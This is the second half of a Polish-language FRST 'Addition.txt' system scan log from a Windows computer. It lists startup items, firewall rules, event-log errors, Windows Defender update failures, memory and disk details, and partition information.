HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer = & gt; (SmartScreenEnabled: RequireAdmin)
Zapora systemu Windows [funkcja włączona]

==================== MSCONFIG/TASK MANAGER - Wyłączone elementy ==

MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^McAfee Security Scan Plus.lnk = & gt; C:\Windows\pss\McAfee Security Scan Plus.lnk.CommonStartup
MSCONFIG\startupfolder: C:^Users^Arek^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Dropbox.lnk = & gt; C:\Windows\pss\Dropbox.lnk.Startup
MSCONFIG\startupreg: CanonMyPrinter = & gt; C:\Program Files\Canon\MyPrinter\BJMyPrt.exe /logon
MSCONFIG\startupreg: CanonSolutionMenuEx = & gt; C:\Program Files\Canon\Solution Menu EX\CNSEMAIN.EXE /logon
MSCONFIG\startupreg: ChomikBox = & gt; C:\Program Files\ChomikBox\chomikbox.exe
MSCONFIG\startupreg: Dropbox Update = & gt; " C:\Users\Arek\AppData\Local\Dropbox\Update\DropboxUpdate.exe " /c
MSCONFIG\startupreg: HotKeysCmds = & gt; C:\Windows\system32\hkcmd.exe
MSCONFIG\startupreg: IgfxTray = & gt; C:\Windows\system32\igfxtray.exe
MSCONFIG\startupreg: MSC = & gt; " c:\Program Files\Microsoft Security Client\msseces.exe " -hide -runkey
MSCONFIG\startupreg: Persistence = & gt; C:\Windows\system32\igfxpers.exe
MSCONFIG\startupreg: PWRISOVM.EXE = & gt; C:\Program Files\PowerISO\PWRISOVM.EXE
MSCONFIG\startupreg: Sidebar = & gt; C:\Program Files\Windows Sidebar\sidebar.exe /autoRun
MSCONFIG\startupreg: SunJavaUpdateSched = & gt; " C:\Program Files\Common Files\Java\Java Update\jusched.exe "
MSCONFIG\startupreg: Windows Mobile Device Center = & gt; %windir%\WindowsMobile\wmdc.exe
MSCONFIG\startupreg: Zune Launcher = & gt; " C:\Program Files\Zune\ZuneLauncher.exe "
HKLM\...\StartupApproved\Run: = & gt; " SynTPEnh "
HKLM\...\StartupApproved\Run: = & gt; " InstallerLauncher "
HKU\S-1-5-21-3402518616-1825306349-2235242046-1000\...\StartupApproved\Run: = & gt; " Agent Portfela Bitdefender "
HKU\S-1-5-21-3402518616-1825306349-2235242046-1000\...\StartupApproved\Run: = & gt; " GoogleChromeAutoLaunch_CF8087D391BF9923F210702354BF6ED6 "
HKU\S-1-5-21-3402518616-1825306349-2235242046-1000\...\StartupApproved\Run: = & gt; " OneDrive "

==================== Reguły Zapory systemu Windows (filtrowane) ===============

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)

FirewallRules: [UDP Query User{68A4B20B-98B0-4397-8707-0AD9AA32CD6F}C:\program files\itibiti soft phone\itibiti.exe] = & gt; (Block) C:\program files\itibiti soft phone\itibiti.exe
FirewallRules: [TCP Query User{5008F43D-571E-4465-80E4-91C40D51F3EB}C:\program files\itibiti soft phone\itibiti.exe] = & gt; (Block) C:\program files\itibiti soft phone\itibiti.exe
FirewallRules: [UDP Query User{E6AFDB7D-0634-4314-9922-47D9688CA306}C:\program files\videolan\vlc\vlc.exe] = & gt; (Allow) C:\program files\videolan\vlc\vlc.exe
FirewallRules: [TCP Query User{9C896E33-7F95-434B-B85C-E11B2AA6F6BA}C:\program files\videolan\vlc\vlc.exe] = & gt; (Allow) C:\program files\videolan\vlc\vlc.exe
FirewallRules: [{987C9858-3DDC-45D3-A143-60C36098B257}] = & gt; (Allow) C:\Users\Arek\AppData\Local\Chromium\Application\chrome.exe
FirewallRules: [UDP Query User{1CF01027-0CED-48F9-B6DF-A5D863A9A9F8}C:\program files\mozilla firefox\firefox.exe] = & gt; (Allow) C:\program files\mozilla firefox\firefox.exe
FirewallRules: [TCP Query User{28041E84-FB58-4B60-9931-EA93CFF78C12}C:\program files\mozilla firefox\firefox.exe] = & gt; (Allow) C:\program files\mozilla firefox\firefox.exe
FirewallRules: [UDP Query User{88AB8847-602B-4EFC-8258-A484CD47E9BD}C:\users\arek\appdata\roaming\dropbox\bin\dropbox.exe] = & gt; (Allow) C:\users\arek\appdata\roaming\dropbox\bin\dropbox.exe
FirewallRules: [TCP Query User{E72CCB74-ABDB-4747-810C-FD8EEAB6A940}C:\users\arek\appdata\roaming\dropbox\bin\dropbox.exe] = & gt; (Allow) C:\users\arek\appdata\roaming\dropbox\bin\dropbox.exe
FirewallRules: [{4476C6AB-50DF-46D1-9A2F-961A28C999C6}] = & gt; (Allow) C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe
FirewallRules: [{991EB4F4-AF17-497F-B4C5-E76BEE0D0E21}] = & gt; (Allow) C:\Users\Arek\AppData\Roaming\Dropbox\bin\Dropbox.exe
FirewallRules: [{04B4E5AD-3DC5-47A9-A51C-0A308B28B553}] = & gt; (Allow) C:\Users\Arek\AppData\Roaming\Dropbox\bin\Dropbox.exe
FirewallRules: [UDP Query User{70BF096C-C2C9-43D0-97C6-A5039089E9B7}E:\easysetupassistant\wr741n\easysetupassistant.exe] = & gt; (Allow) E:\easysetupassistant\wr741n\easysetupassistant.exe
FirewallRules: [TCP Query User{FA03B909-3A62-4970-95DE-D55618625580}E:\easysetupassistant\wr741n\easysetupassistant.exe] = & gt; (Allow) E:\easysetupassistant\wr741n\easysetupassistant.exe
FirewallRules: [UDP Query User{31F6D614-9B38-4369-A45D-35AF23BBDDD9}C:\program files\gadu-gadu 10\gg.exe] = & gt; (Allow) C:\program files\gadu-gadu 10\gg.exe
FirewallRules: [TCP Query User{B2768E66-6E26-41A3-AFE9-552DA4989F82}C:\program files\gadu-gadu 10\gg.exe] = & gt; (Allow) C:\program files\gadu-gadu 10\gg.exe
FirewallRules: [{6E0AC94C-FB07-4494-873F-E320D8EFC588}] = & gt; (Allow) LPort=5432
FirewallRules: [{5C7A82EE-ACA2-4396-A124-69945FAED4DD}] = & gt; (Allow) LPort=5432

==================== Punkty Przywracania systemu =========================

31-08-2016 22:46:27 Zaplanowany punkt kontrolny
31-08-2016 23:30:07 Operacja przywracania

==================== Wadliwe urządzenia w Menedżerze urządzeń =============


==================== Błędy w Dzienniku zdarzeń: =========================

Dziennik Aplikacja:
==================
Error: (09/07/2018 11:14:58 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: ZARZĄDZANIE NT)
Description: Unloading the performance counter strings for service WmiApRpl (WmiApRpl) failed. The first DWORD in the Data section contains the error code.

Error: (09/07/2018 11:14:58 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: ZARZĄDZANIE NT)
Description: The performance strings in the Performance registry value is corrupted when process Performance extension counter provider. The BaseIndex value from the Performance registry is the first DWORD in the Data section, LastCounter value is the second DWORD in the Data section, and LastHelp value is the third DWORD in the Data section.

Error: (09/07/2018 11:14:58 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: ZARZĄDZANIE NT)
Description: The performance strings in the Performance registry value is corrupted when process Performance extension counter provider. The BaseIndex value from the Performance registry is the first DWORD in the Data section, LastCounter value is the second DWORD in the Data section, and LastHelp value is the third DWORD in the Data section.

Error: (09/07/2018 10:44:21 AM) (Source: Windows Backup) (EventID: 4103) (User: )
Description: Nie ukończono wykonywania kopii zapasowej z powodu błędu zapisu w lokalizacji kopii zapasowej F:\. Błąd: Nie można odnaleźć lokalizacji kopii zapasowej lub jest ona nieprawidłowa. Przejrzyj ustawienia kopii zapasowej i sprawdź lokalizację kopii zapasowej. (0x81000006).

Error: (10/11/2016 04:19:22 PM) (Source: Windows Backup) (EventID: 4103) (User: )
Description: Nie ukończono wykonywania kopii zapasowej z powodu błędu zapisu w lokalizacji kopii zapasowej F:\. Błąd: Nie można odnaleźć lokalizacji kopii zapasowej lub jest ona nieprawidłowa. Przejrzyj ustawienia kopii zapasowej i sprawdź lokalizację kopii zapasowej. (0x81000006).

Error: (09/01/2016 12:14:42 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: ZARZĄDZANIE NT)
Description: Unloading the performance counter strings for service WmiApRpl (WmiApRpl) failed. The first DWORD in the Data section contains the error code.

Error: (09/01/2016 12:14:42 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: ZARZĄDZANIE NT)
Description: The performance strings in the Performance registry value is corrupted when process Performance extension counter provider. The BaseIndex value from the Performance registry is the first DWORD in the Data section, LastCounter value is the second DWORD in the Data section, and LastHelp value is the third DWORD in the Data section.

Error: (09/01/2016 12:14:42 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: ZARZĄDZANIE NT)
Description: The performance strings in the Performance registry value is corrupted when process Performance extension counter provider. The BaseIndex value from the Performance registry is the first DWORD in the Data section, LastCounter value is the second DWORD in the Data section, and LastHelp value is the third DWORD in the Data section.


Dziennik System:
=============
Error: (09/07/2018 11:10:10 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: Usługa NetTcpActivator zależy od usługi NetTcpPortSharing, której nie można uruchomić z powodu następującego błędu:
Nie można uruchomić określonej usługi, ponieważ jest ona wyłączona lub ponieważ nie są włączone skojarzone z nią urządzenia.

Error: (09/07/2018 11:09:07 AM) (Source: Service Control Manager) (EventID: 7024) (User: )
Description: Usługa Optymalizacja dostarczania zakończyła działanie; wystąpił następujący specyficzny dla niej błąd:
Klasa jest skonfigurowana do pracy jako identyfikator bezpieczeństwa inny niż wywołujący.

Error: (09/07/2018 11:06:32 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: Usługa NetTcpActivator zależy od usługi NetTcpPortSharing, której nie można uruchomić z powodu następującego błędu:
Nie można uruchomić określonej usługi, ponieważ jest ona wyłączona lub ponieważ nie są włączone skojarzone z nią urządzenia.

Error: (09/07/2018 10:54:59 AM) (Source: Service Control Manager) (EventID: 7043) (User: )
Description: Usługa Środowiska i telemetria połączonego użytkownika nie została poprawnie zamknięta po odebraniu kodu sterującego przed zamknięciem.

Error: (09/07/2018 10:54:10 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Nie można uruchomić usługi Menedżer konfiguracji urządzeń z powodu następującego błędu:
Usługa nie odpowiada na sygnał uruchomienia lub sygnał sterujący w oczekiwanym czasie.

Error: (09/07/2018 10:54:09 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Nie można uruchomić usługi Menedżer konfiguracji urządzeń z powodu następującego błędu:
Usługa nie odpowiada na sygnał uruchomienia lub sygnał sterujący w oczekiwanym czasie.

Error: (09/07/2018 10:49:11 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Nie można uruchomić usługi Asystent logowania za pomocą konta Microsoft z powodu następującego błędu:
Usługa nie odpowiada na sygnał uruchomienia lub sygnał sterujący w oczekiwanym czasie.

Error: (09/07/2018 10:49:11 AM) (Source: Service Control Manager) (EventID: 7046) (User: )
Description: Następująca usługa ponownie przestała odpowiadać na żądania sterowania usługą: Wykrywanie sprzętu powłoki

Skontaktuj się z dostawcą usługi lub administratorem systemu, aby dowiedzieć się, czy należy wyłączyć tę usługę do momentu zidentyfikowania problemu.

Przed wyłączeniem usługi może być konieczne ponowne uruchomienie komputera w trybie awaryjnym.


Windows Defender:
===================================
Date: 2016-08-30 21:55:58.056
Description:
Produkt Windows Defender napotkał błąd podczas próby aktualizacji podpisów.
Nowa wersja podpisu:
Poprzednia wersja podpisu: 115.8.0.0
Źródło aktualizacji: Centrum firmy Microsoft ds. ochrony przed złośliwym oprogramowaniem
Typ podpisu: System inspekcji sieci
Typ aktualizacji: Pełne
Użytkownik: ZARZĄDZANIE NT\USŁUGA SIECIOWA
Bieżąca wersja aparatu:
Poprzednia wersja aparatu: 2.1.11804.0
Kod błędu: 0x80072ee7
Opis błędu: Nie można określić nazwy serwera lub adresu.

Date: 2016-08-30 21:55:58.040
Description:
Produkt Windows Defender napotkał błąd podczas próby aktualizacji podpisów.
Nowa wersja podpisu:
Poprzednia wersja podpisu: 1.207.2950.0
Źródło aktualizacji: Centrum firmy Microsoft ds. ochrony przed złośliwym oprogramowaniem
Typ podpisu: Oprogramowanie antyszpiegowskie
Typ aktualizacji: Pełne
Użytkownik: ZARZĄDZANIE NT\USŁUGA SIECIOWA
Bieżąca wersja aparatu:
Poprzednia wersja aparatu: 1.1.12101.0
Kod błędu: 0x80072ee7
Opis błędu: Nie można określić nazwy serwera lub adresu.

Date: 2016-08-30 21:55:58.039
Description:
Produkt Windows Defender napotkał błąd podczas próby aktualizacji podpisów.
Nowa wersja podpisu:
Poprzednia wersja podpisu: 1.207.2950.0
Źródło aktualizacji: Centrum firmy Microsoft ds. ochrony przed złośliwym oprogramowaniem
Typ podpisu: Oprogramowanie antywirusowe
Typ aktualizacji: Pełne
Użytkownik: ZARZĄDZANIE NT\USŁUGA SIECIOWA
Bieżąca wersja aparatu:
Poprzednia wersja aparatu: 1.1.12101.0
Kod błędu: 0x80072ee7
Opis błędu: Nie można określić nazwy serwera lub adresu.

Date: 2016-08-30 21:55:57.932
Description:
Produkt Windows Defender napotkał błąd podczas próby aktualizacji podpisów.
Nowa wersja podpisu:
Poprzednia wersja podpisu: 1.207.2950.0
Źródło aktualizacji: Serwer usługi Microsoft Update
Typ podpisu: Oprogramowanie antywirusowe
Typ aktualizacji: Pełne
Użytkownik: ZARZĄDZANIE NT\SYSTEM
Bieżąca wersja aparatu:
Poprzednia wersja aparatu: 1.1.12101.0
Kod błędu: 0x80240438
Opis błędu: Podczas sprawdzania aktualizacji wystąpił nieoczekiwany problem. Aby uzyskać informacje na temat instalowania aktualizacji i rozwiązywania problemów z nimi, zobacz Pomoc i obsługę techniczną.

Date: 2016-01-30 10:35:30.777
Description:
Produkt Windows Defender napotkał błąd podczas próby aktualizacji podpisów.
Nowa wersja podpisu:
Poprzednia wersja podpisu: 115.8.0.0
Źródło aktualizacji: Centrum firmy Microsoft ds. ochrony przed złośliwym oprogramowaniem
Typ podpisu: System inspekcji sieci
Typ aktualizacji: Pełne
Użytkownik: ZARZĄDZANIE NT\USŁUGA SIECIOWA
Bieżąca wersja aparatu:
Poprzednia wersja aparatu: 2.1.11804.0
Kod błędu: 0x80072ee7
Opis błędu: Nie można określić nazwy serwera lub adresu.

CodeIntegrity:
===================================

Date: 2016-01-30 10:40:07.233
Description:
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-01-25 09:57:44.815
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\Windows\assembly\GAC\Microsoft.StdFormat\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.StdFormat.dll that did not meet the Microsoft signing level requirements.

Date: 2016-01-25 09:57:44.657
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\Windows\assembly\GAC\ADODB\7.0.3300.0__b03f5f7f11d50a3a\ADODB.dll that did not meet the Microsoft signing level requirements.

Date: 2016-01-25 09:57:44.475
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\Windows\assembly\GAC\MSDATASRC\7.0.3300.0__b03f5f7f11d50a3a\MSDATASRC.dll that did not meet the Microsoft signing level requirements.

Date: 2016-01-25 09:57:43.924
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\Windows\assembly\GAC\Microsoft.StdFormat\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.StdFormat.dll that did not meet the Microsoft signing level requirements.

Date: 2016-01-25 09:57:43.612
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\Windows\assembly\GAC\ADODB\7.0.3300.0__b03f5f7f11d50a3a\ADODB.dll that did not meet the Microsoft signing level requirements.

Date: 2016-01-25 09:57:43.187
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\Windows\assembly\GAC\MSDATASRC\7.0.3300.0__b03f5f7f11d50a3a\MSDATASRC.dll that did not meet the Microsoft signing level requirements.

Date: 2016-01-25 09:57:31.942
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\Windows\assembly\GAC\stdole\7.0.3300.0__b03f5f7f11d50a3a\stdole.dll that did not meet the Microsoft signing level requirements.

==================== Statystyki pamięci ===========================

Procesor: Intel(R) Pentium(R) Dual CPU T2310 @ 1.46GHz
Procent pamięci w użyciu: 36%
Całkowita pamięć fizyczna: 2038.43 MB
Dostępna pamięć fizyczna: 1293.42 MB
Całkowita pamięć wirtualna: 4086.43 MB
Dostępna pamięć wirtualna: 3248.58 MB

==================== Dyski ================================

Drive c: () (Fixed) (Total:71.56 GB) (Free:47.5 GB) NTFS
Drive d: () (Fixed) (Total:39.69 GB) (Free:39.35 GB) NTFS
Drive f: (U3 System) (CDROM) (Total:0.01 GB) (Free:0 GB) CDFS
Drive g: (1TB) (Removable) (Total:3.74 GB) (Free:0.03 GB) NTFS

\\?\Volume{2dc17a8b-20c4-11e0-9923-806e6f6e6963}\ (Zastrzeżone przez system) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS
\\?\Volume{199c199b-0000-0000-0000-50ea11000000}\ () (Fixed) (Total:0.44 GB) (Free:0.09 GB) NTFS

==================== MBR & Tablica partycji ==================

========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 111.8 GB) (Disk ID: 199C199B)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=71.6 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=450 MB) - (Type=27)
Partition 4: (Not Active) - (Size=39.7 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (Size: 3.7 GB) (Disk ID: 87DBD8DE)
Partition 1: (Not Active) - (Size=3.7 GB) - (Type=07 NTFS)

==================== Koniec Addition.txt ============================